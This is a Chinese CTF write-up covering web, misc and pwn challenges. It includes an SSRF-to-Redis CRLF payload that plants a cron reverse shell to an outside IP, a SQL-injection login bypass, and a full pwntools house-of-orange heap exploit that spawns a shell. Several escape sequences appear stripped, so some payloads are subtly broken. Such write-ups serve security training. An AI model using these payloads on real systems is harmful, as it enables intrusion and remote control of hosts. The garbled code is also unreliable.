WEB
1.ezpy
题目简介:ezpy
打开题目环境,发现这里可传入参数,构造 siteurl
传参 file:///etc/passwd 测试,读取敏感文件,确定此处存在 SSRF漏洞
源码获取,读取 file:///app/app.py
#!python
#!/usr/bin/env python3
import os
import urllib
import urllib.request
import urllib.error
import redis as redis
from flask import Flask, request, render_template
app = Flask(__name__)
redis_conn = redis.Redis(host='127.0.0.1', port=6379, password=os.getenv("P"), db=0)
@app.route("/getinfo")
def getinfo():
sitename = request.args.get("sitename")
sitename = redis_conn.get(sitename).decode()
if not sitename.startswith(('http','file')):
return "错误:不支持协议"
try:
return urllib.request.urlopen(sitename).read()
except Exception as e:
return "错误: " + str(e)
@app.route("/setinfo",methods=['POST'])
def setinfo():
username = request.form.get("sitename")
siteurl = request.form.get("siteurl")
if redis_conn.set(username,siteurl):
return "ok"
return "!!!"
@app.route("/")
def index():
return render_template("index.html")
@app.route("/sitelist")
def sitelist():
return render_template("sitelist.html",sitelist=redis_conn.keys())
@app.route("/source")
def source():
return open("/app/app.py","r").read()
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80,debug=False)
代码审计进行分析,漏洞点是Redis + CRLF密码认证攻击
进一步利用,读取 file:///proc/self/environ,构造 sitename=env&siteurl=file:///proc/self/environ,获取到Redis认证密码 P=1bcc23dfc231aac
进行
正常构造EXP,这里可能是环境问题没打通,可以弹shell
from urllib.parse import *
payload = 'http://127.0.0.1:6379/ HTTP/1.1rnauth 1bcc23dfc231aacrn$8rnflushallrn*3rn$3rnsetrn$1rn1rn$66rnrnrn*/1 * * * * bash -c "sh -i >& /dev/tcp/111.11.11.11/7777 0>&1"rnrnrn*4rn$6rnconfigrn$3rnsetrn$3rndirrn$16rn/var/spool/cron/rn*4rn$6rnconfigrn$3rnsetrn$10rndbfilenamern$4rnrootrn*1rn$4rnsavernrnmochu7:'
print(quote(payload))
可参考:https://www.cnblogs.com/-chenxs/p/11749367.html
直接打一个非预期解构造读 file:///flag_this_ffffffffffffllllllag
3.你能登陆成功吗
题目简介:你懂SQL注入么?
进行分析代码,需要解一下AST混淆解密
源码如下
function generateCode() {
var _0x14a6a7 = "";
var _0x4bcaea = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
for (var _0xac6612 = 0; _0xac6612 < 6; _0xac6612++) {
_0x14a6a7 += _0x4bcaea.charAt(Math.floor(Math.random() * _0x4bcaea.length));
}
var _0x82e87 = btoa(_0x14a6a7);
document.cookie = "code=" + _0x82e87;
}
function checkCode() {
var _0xd7e900 = document.getElementById("inputCode").value;
var _0x21f06b = atob(getCookie("code"));
if (_0xd7e900 == _0x21f06b) {
var _0x267712 = document.getElementById("username").value;
var _0x4a10bb = document.getElementById("password").value;
var _0x2c2c5a = new XMLHttpRequest();
_0x2c2c5a.onreadystatechange = function () {
if (this.readyState == 4 && this.status == 200) {
var _0x59f447 = this.responseText;
if (_0x59f447.startsWith("SangFor")) {
document.getElementById("error").style.display = "none";
document.getElementById("login_err").style.display = "none";
document.getElementById("result").style.display = "block";
document.getElementById("result").innerHTML = _0x59f447;
} else {
document.getElementById("error").style.display = "none";
document.getElementById("result").style.display = "none";
document.getElementById("login_err").style.display = "block";
generateCode();
}
}
};
_0x2c2c5a.open("POST", "check.php", !![]);
_0x2c2c5a.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
_0x2c2c5a.send("username=" + _0x267712 + "&password=" + _0x4a10bb);
} else {
document.getElementById("result").style.display = "none";
document.getElementById("login_err").style.display = "none";
document.getElementById("error").style.display = "block";
generateCode();
}
}
function getCookie(_0x617f73) {
var _0x47310a = _0x617f73 + "=";
var _0x47a18a = decodeURIComponent(document.cookie);
var _0x4665e4 = _0x47a18a.split(";");
for (var _0x1d1bf4 = 0; _0x1d1bf4 < _0x4665e4.length; _0x1d1bf4++) {
var _0x5ef03f = _0x4665e4[_0x1d1bf4];
while (_0x5ef03f.charAt(0) == " ") {
_0x5ef03f = _0x5ef03f.substring(1);
}
if (_0x5ef03f.indexOf(_0x47310a) == 0) {
return _0x5ef03f.substring(_0x47310a.length, _0x5ef03f.length);
}
}
return "";
}
(function () {
var _0x447a33 = function () {
var _0x4da5fd;
try {
_0x4da5fd = Function("return (function() {}.constructor("return this")( ));")();
} catch (_0xbab740) {
console.log(_0xbab740);
_0x4da5fd = window;
}
return _0x4da5fd;
};
var _0x3d1853 = _0x447a33();
_0x3d1853.setInterval(_0x4ac02e, 4000);
})();
分析源码,直接看这一段,存在SQL注入
构造exp如下,获取flag
GET /check.php
POST
username=1' or '1'='1&password=1' or '1'='1
MISC
1.1024
获得一张图片,使用 stegsolver 打开,发现有额外数据
提取出出来数据
0d0a262378303035 333b262378303036 313b262378303036 653b262378303036 373b262378303034 363b262378303036 663b262378303037 323b262378303037 623b262378303034 623b262378303033 393b262378303034 353b262378303035 663b262378303033 373b262378303035 663b262378303035 613b262378303034 333b262378303033 393b262378303037 323b262378303037 343b262378303033 323b262378303036 373b262378303037 323b262378303034 643b262378303033 323b262378303037 313b262378303036 643b262378303036 343b262378303034 653b262378303034 613b262378303036 393b262378303037 613b262378303035 663b262378303037 303b262378303034 613b262378303034 643b262378303037 393b262378303036 613b262378303036 353b262378303033 343b262378303034 613b262378303037 64
进行处理
PWN
1.原神启动
代码审计
main函数
sub_D3D
发现进入choose 1 函数时,需要对应值不为零:
在choose 2函数里有个函数没有对正负进行检测:
也有将unk_2030e4的值改为1的函数,但需要将money大于1000000:
在choose 1函数里有堆溢出漏洞:
思路:
给我们的libc版本是2.23的,在2.23 + malloc + 没有free 就很容易想到 house of orange
我们先利用choose 1 的没有进行整数的正负的判断,而使得我们的money大于10000000,然后就进行house of orange,从而get shell
exp:
from pwn import*
context(arch='amd64', os='linux',log_level="debug")
context.terminal=["wt.exe","wsl.exe"]
# libc = ELF("./libc-so.6")
libc = ELF("./libc-2.23.so")
"""""
def xxx():
p.sendlineafter("")
p.sendlineafter("")
p.sendlineafter("")
"""
def get_p(name):
global p,elf
# p = process(["./ld-2.23.so", name],
# env={"LD_PRELOAD":"./libc-2.23.so "})
p = process(name)
p = remote("ctfx.edu.sangfor.com.cn",)
elf = ELF(name)
def add(idx,size,content):
p.sendlineafter("input : ",str(idx))
p.sendlineafter("make your choice: ",'1')
p.sendlineafter("How many words would you like to use to write this description: ",str(size))
p.sendlineafter("Now please write a description of this city : ",content)
def show(idx):
p.sendlineafter("input : ",str(idx))
p.sendlineafter("make your choice: ",'2')
def edit(idx,content):
p.sendlineafter("input : ",str(idx))
p.sendlineafter("make your choice: ",'1')
p.sendafter("Please modify the information now: ",content)
def get_shell():
p.sendlineafter("input : ",str(3))
p.sendlineafter("make your choice: ",'1')
# gdb.attach(p)
# sleep(2)
p.sendlineafter("How many words would you like to use to write this description: ",str(0x80))
get_p("./yuanshen_start")
# gdb.attach(p,"")
p.sendlineafter("3.leave the world",'2')
p.sendlineafter("4.exit",'1')
p.sendlineafter("3.",'1')
# print(hex(libc.sym['puts']))
p.sendlineafter("How many?","-100000")
p.sendlineafter("4.exit",'2')
p.sendlineafter("4.exit",'4')
p.sendlineafter("3.leave the world",'1')
add(0,0x80,"AAAAAA")
edit(0,0x88*b"A" + p64(0xf71))
add(1,0x1000,"AAAAAA")
edit(0,0x90*"A")
show(0)
libc.address = u64(p.recvuntil("x7f")[-6:].ljust(0x8,b'x00')) - 88 - 0x10 - libc.sym['__malloc_hook']
print(hex(libc.address))
io_list_all = libc.sym['_IO_list_all']
system_addr = libc.sym['system']
edit(0,0x88*b"A" + p64(0xf51))
add(2,0x400,b'c'*0x8)
edit(2,"A"*0x10)
show(2)
p.recvuntil("AAAAAAAAAAAAAAAA")
heap_base = u64(p.recvline()[:-1].ljust(8,b"x00")) - 0x90
print(hex(heap_base))
payload = b'A' * 0x400
fake_file = b'/bin/shx00'+p64(0x61) #to small bin
#bk设置为_IO_list_all-0x10,目的是向_IO_list_all写入main_arena地址
fake_file += p64(0)+p64(io_list_all-0x10)
fake_file += p64(0) + p64(1) #保证_IO_write_base < _IO_write_ptr
#在wirte_end及之后的内容直到mode都是对我们没用的数据(0x30到0xc0,含chunk_header0x20),直接填0
fake_file = fake_file.ljust(0xc0,b'x00')
#_IO_FILE结构中最后的unused部分没有用到,也填0,所以整个_IO_FILE结构为0xd8
fake_file += p64(0) * 3
fake_file += p64(heap_base+0x590 - 0x18) #vtable ptr
fake_file += p64(0) * 2
#_IO_OVERFLOW覆盖为 system 的地址,其第一个参数就是fake_file_addr
fake_file += p64(system_addr)
payload += fake_file
edit(2,payload)
get_shell()
p.interactive()原文始发于微信公众号(ACT Team):2023深圳·中国1024程序员CTF信息安全大赛初赛Writeup
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论